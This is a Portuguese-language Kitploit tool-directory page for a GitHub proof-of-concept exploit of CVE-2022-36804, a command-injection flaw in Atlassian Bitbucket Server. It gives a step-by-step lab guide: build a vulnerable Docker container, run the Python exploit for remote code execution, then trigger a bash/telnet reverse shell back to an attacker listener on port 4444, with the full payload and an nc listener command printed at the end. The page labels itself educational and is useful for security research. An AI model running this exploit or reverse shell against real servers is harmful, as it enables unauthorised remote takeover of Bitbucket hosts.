Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-36804 | Kitploit
Ferramentas/GitHubGitHub/asepsaepdin/cve-2022-36804
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e Educação
GitHubasepsaepdin/cve-2022-36804

CVE-2022-36804

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-36804 - Vulnerabilidade de Injeção de Comandos no Atlassian Bitbucket Server e Data Center

Python


⚠️ Apenas para fins educacionais e de pesquisa de segurança autorizada

Autores do Exploit Original

Muito grato ao autor original do PoC Walnut Security Services Pvt. Ltd

Descrição

Vários endpoints de API no Atlassian Bitbucket Server e Data Center 7.0.0 antes da versão 7.6.17, da versão 7.7.0 antes da versão 7.17.10, da versão 7.18.0 antes da versão 7.21.4, da versão 8.0.0 antes da versão 8.0.3, da versão 8.1.0 antes da versão 8.1.3, da versão 8.2.0 antes da versão 8.2.2 e da versão 8.3.0 antes de 8.3.1 permitem que atacantes remotos com permissões de leitura em um repositório Bitbucket público ou privado executem código arbitrário enviando uma solicitação HTTP maliciosa. Esta vulnerabilidade foi relatada por TheGrandPew por meio do nosso Programa de Bug Bounty.


Guia Passo a Passo

  1. Primeiro, clone o repositório

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-36804.git
    
  2. Mude de diretório

    root@kitploit:~
    cd CVE-2022-36804
    
  3. Construa o contêiner vulnerável

    root@kitploit:~
    docker build -t CVE-2022-36804 .
    
  4. Execute o contêiner efêmero

    root@kitploit:~
    docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
    
  5. Verifique o endereço IP do contêiner

    root@kitploit:~
    docker inspect CVE-2022-36804 | grep "IPAddress"
    
  6. Configure o Atlassian Bitbucket e crie um novo repositório público abrindo a URL: http://172.17.0.3:7990

  7. Verifique a Execução Remota de Código (RCE)

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.3:7990
    
  8. Verifique a RCE com comando personalizado (cmd)

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
    
  9. Do ponto de vista de um atacante, a execução remota de código é fundamental para obter acesso a um shell interativo. Portanto, executar o seguinte comando acionaria um reverse shell via telnet sobre TCP baseado em bash para o sistema do atacante na porta 4444/tcp:


Créditos

  • https://github.com/walnutsecurity/cve-2022-36804
  • https://nvd.nist.gov/vuln/detail/cve-2022-36804
Baixar ferramenta
root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
root@kitploit:~
nc -nlvp 4444